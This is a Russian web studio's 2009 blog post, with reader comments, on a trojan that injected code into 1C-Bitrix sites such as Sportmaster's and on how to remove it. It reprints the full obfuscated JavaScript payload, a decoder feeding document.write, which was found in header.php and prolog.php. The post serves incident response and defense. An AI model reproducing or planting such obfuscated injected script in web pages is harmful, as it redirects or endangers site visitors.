Телефон в Москве:

(495) 788-77-16

в Санкт-Петербурге:

(812) 313-28-51

по России (бесплатно):

8-800-555-11-32

Опыт  говорит  сам  за  себя:

• более 130 реализованных проектов за все время существования компании

• успешное сотрудничество с крупнейшими компаниями российского бизнеса

Вирус-троян для сайтов, созданных на 1С-Битрикс и как с ним бороться

Вирус-троян для сайтов, созданных на 1С-Битрикс и как с ним бороться

Сразу оговорюсь, что вирус не уничтожает сайт, он только мешает посетителям сайта увидеть нужный сайт (делает он это путём переадресации посетителя на другой сайт, который не существует. Следовательно пользователь видит, что страница не найдена и считает, что именно посещаемый им сайт, а не сайт, куда его переадресует вирус - не доступен).

Обслуживая проект Спортмастер (www.sportmaster.ru) мы столкнулись с тем, что 08.06.2009 страницы данного сайта либо загружались со "второго" раза (сообщали, что страница не найдена), либо стали запускать внешнее приложение Adobe Reader (PDF).

Используем лицензионный NOD32. Когда Adobe Reader (PDF) запускался, антивирус блокировал его выполнение и в целом сайт грузился. Но тесты показали, что не всё так было успешно, т.е. большинство браузеров с ошибкой загружали сайт, но Internet Explorer версии 6 и 7 версии (чаще всего 7 версия, т.к. 6-я версия после долгих раздумий загружала) ни в каком виде не запускали сайт.

[spoiler]

Самый простой поиск вируса - поиск "излишеств" в коде, с него и начали. Учитывая, что разработан сайт в нашей компании, наши специалисты достаточно быстро обнаружили посторонний код:

<script language="javascript">function _lHrdPPtSyemSH4( _lrtylX7oxRs8gD ){
var _lpjW0aeh3uwnCl = "/9zC0UBm4AeR52+37ibEOKrMDtyTdu8cqsajIfPGhpSYlQXn1xkHFWVJNZowLgv6";
var _lHp3Pjl9XMXV1K = '';var _lmjJJmyt9oJdMD = 18;var _lO8qRky6dEfED3 = 0;
for ( var _lRbPIl1suBVjuV = 0; _lRbPIl1suBVjuV < _lrtylX7oxRs8gD.length; _lRbPIl1suBVjuV++ )
{ var _lO3za6DYnU9bQc = _lpjW0aeh3uwnCl.indexOf( _lrtylX7oxRs8gD.charAt( _lRbPIl1suBVjuV ) );
if ( _lmjJJmyt9oJdMD == 0 ) { _lO8qRky6dEfED3 = _lO8qRky6dEfED3 | _lO3za6DYnU9bQc;
var _lgwhkqyB67nxqY = ( _lO8qRky6dEfED3 & 0xFF0000 ) >> 16;
if ( _lgwhkqyB67nxqY != 0 ) {_lHp3Pjl9XMXV1K += String.fromCharCode( _lgwhkqyB67nxqY );}
var _lzC7jXLcMlZQAC = ( _lO8qRky6dEfED3 & 0xFF00 ) >> 8;
if ( _lzC7jXLcMlZQAC != 0 ){_lHp3Pjl9XMXV1K += String.fromCharCode( _lzC7jXLcMlZQAC );}
var _lk9e1cAoAlVzmR = _lO8qRky6dEfED3 & 0xFF;
if ( _lk9e1cAoAlVzmR != 0 ){_lHp3Pjl9XMXV1K += String.fromCharCode( _lk9e1cAoAlVzmR );}
_lO8qRky6dEfED3 = 0;_lmjJJmyt9oJdMD    = 18;} else {_lO3za6DYnU9bQc = _lO3za6DYnU9bQc << _lmjJJmyt9oJdMD;
_lO8qRky6dEfED3 = _lO8qRky6dEfED3 | _lO3za6DYnU9bQc;_lmjJJmyt9oJdMD -= 6;}}
return _lHp3Pjl9XMXV1K;} 
document.write( _lHrdPPtSyemSH4( '3BfPdPUQtb9HdP5g4PsFum/oRkgXyrZfuBgkDM0Xy 
rNnTzZ1ym/6TPff4a9JyriFyCFx4BsfyruhuCFx4m2F8 rxf3bAVyM2pDPflyMiZ+a9hyriItrNa3j1nyrtkDrWf3q//' ) );</script>



Именно он и портил всю жизнь. Но убрав его, мы через 5 минут обнаружили его на том же месте.

Итак, отойдём от философии вопроса вирусов и их жизни, каково же решение проблемы? Всё оказалось весьма просто.

Лечение вируса

Данный вирус заражает не через доступ по FTP и SSH, он заражает через административный доступ в 1С-Битрикс.

1. Определяем, кто имеет доступ на запись файлов в папке /bitrix/ (В начальной конфигурации 1С-Битрикс - это пользователи, у которых установлена группа "Администраторы").
2. Определяем компьютеры, с которых осуществлялся доступ в панель управления 1С-Битрикс, используя права "Администратора".
3. Вылечиваем вирусы (трояны) на этих компьютерах (если их не вылечить, то при следующем доступе вирус появится вновь на сайте).
4. После лечения компьютеров, входим в панель управления 1С-Битрикс и вызываем на редактирование 2 файла (вирус размещается обычно в них):
/bitrix/header.php
/bitrix/modules/main/include/prolog.php
и удаляем лишний код, он прям в конце файла, его пример указан выше (на всякий случай уточняю: кусок, начинающийся с <script... и заканчивающийся </script>).

Всё, сайт жив.

Единственное уточнение, если Вы не сразу обнаружили этот вирус, то скорее всего некоторое время после его лечения сайт не будет открываться в Internet Explorer 7, во всех других браузерах сайт будет работать без проблем.

На момент написания этой записи мы ещё не связывались с Microsoft для уточнения причины неработоспособности сайта в Internet Explorer 7 (возможно фильтр фишинга или что-то подобное блокирует его открытие даже после излечения).
0
16.06.2009 15:57:47
После выхода этой публикации новая версия не заставила себя долго ждать. Теперь она также пишет себя в файл /bitrix/footer.php и в файлы header.php и footer.php в шаблонах сайта (например, /bitrix/templates/web20/header.php)
Ссылка 0
0
William
21.11.2009 21:55:22
Новая версия 1С-Битрикс? Или новая версия вируса?
Интересует каким образом заражаются файлы...

Может проблема в безопасности хостинга?  
Родитель Ссылка 0
0
24.03.2010 09:40:00
Приношу извинения за долгий ответ, но как раз сегодня опубликовал информацию о том, как чаще всего заражаются сайты, в том числе и на 1С-Битрикс: Бдительность - лучшее "оружие" против вирусов

Хотя в случае со спортмастером был "украден" пароль одного из администраторов сайта. Но схема потери пароля точно такая же.
Родитель Ссылка 0
0
info@netstories.ru
27.05.2011 10:34:21
Спасибо Вам огромное за проделываемую Вами работу!
Ссылка 0
0
17.06.2011 02:32:59
Небольшое дополнение-наблюдение: За 2 года с момента написания данного сообщения все обратившиеся с похожими проблемами клиенты используют на своих компьютерах антивирус от компании Kaspersky. Возможно это совпадение - обвинять кого-либо не является моей целью, но клиенты, использующие другие антивирусы, за 2 года ниразу не обратились с данной проблемой.
Ссылка 0